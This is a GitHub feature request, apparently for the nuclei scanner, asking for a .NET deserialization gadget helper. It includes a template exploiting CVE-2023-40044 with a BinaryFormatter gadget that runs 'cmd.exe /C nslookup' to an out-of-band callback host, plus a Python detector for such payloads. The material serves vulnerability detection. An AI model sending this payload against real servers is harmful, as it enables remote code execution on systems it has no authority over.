Support for .NET deserialization helpers

Open ehsandeep opened this issue 2 years ago • 1 comments

Please describe your feature request:

Similar to generate_java_gadget, additional deserialization helpers need to be added to support writing templates for exploits, including deserialization payload for .NET formatters.

Reference: https://github.com/pwntester/ysoserial.net

Describe the use case of this feature:

Required for CVE-2023-40044

Example:

```
{{generate_dotNet_gadget(gadget, format, cmd, encoding)}}
```

```yaml
http:
  - raw:
      - |
        POST /AHT/AhtApiService.asmx/AuthUser HTTP/2
        Host: {{Hostname}}
        Cookie: ASP.NET_SessionId=lilzf4yfwobb5fsaelo5abez
        Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266
        -----------------------------9051914041544843365972754266
        Content-Disposition: form-data; name="";
        ::AHT_DEFAULT_UPLOAD_PARAMETER::{{generate_dotNet_gadget("TypeConfuseDelegate", "BinaryFormatter", "cmd.exe /C nslookup {{interactsh-url}}", "base64")}}
        -----------------------------9051914041544843365972754266---
```

Example: https://github.com/projectdiscovery/nuclei-templates/pull/8296

Reference: https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044

ehsandeep, Oct 01 '23 12:10
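A defender-side view of the request shape above, as an added example that is not part of the original issue or of nuclei: a base64-encoded BinaryFormatter stream always opens with the MS-NRBF `SerializedStreamHeader` record, so it can be flagged in a request body before it reaches a deserializer. The function names and the sample body are constructed for illustration; the sample stream is an inert header plus `MessageEnd` record with no objects.

```python
import base64
import re
import struct

# Base64 runs of at least 24 characters (18 bytes), enough to hold the
# 17-byte SerializedStreamHeader that opens a BinaryFormatter stream.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def is_nrbf_header(data: bytes) -> bool:
    """True if data starts with an MS-NRBF SerializedStreamHeader record."""
    if len(data) < 17:
        return False
    # RecordTypeEnum (1 byte), RootId, HeaderId, MajorVersion, MinorVersion
    record_type, _root, _hdr, major, minor = struct.unpack_from("<Biiii", data)
    return record_type == 0 and major == 1 and minor == 0


def find_binaryformatter_blobs(body: str) -> list[int]:
    """Offsets of base64 runs in body that decode to a BinaryFormatter stream."""
    hits = []
    for match in B64_RUN.finditer(body):
        try:
            # Only the first 24 characters are needed to read the header.
            head = base64.b64decode(match.group(0)[:24], validate=True)
        except ValueError:
            continue
        if is_nrbf_header(head):
            hits.append(match.start())
    return hits


# Constructed sample: an inert stream (header + MessageEnd record, no objects)
# placed in a multipart field shaped like the request in the issue.
INERT_STREAM = struct.pack("<Biiii", 0, 1, -1, 1, 0) + b"\x0b"
SAMPLE_BODY = (
    "-----------------------------1234\r\n"
    'Content-Disposition: form-data; name="";\r\n\r\n'
    "::AHT_DEFAULT_UPLOAD_PARAMETER::"
    + base64.b64encode(INERT_STREAM).decode()
    + "\r\n-----------------------------1234--\r\n"
)

if __name__ == "__main__":
    for offset in find_binaryformatter_blobs(SAMPLE_BODY):
        print(f"BinaryFormatter stream header at body offset {offset}")
```

Checking the decoded header fields rather than a fixed string prefix also catches streams whose `RootId` or `HeaderId` differ from the common `AAEAAAD/////` form.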

+1 commenting to follow

l0nedigit, Oct 05 '23 20:10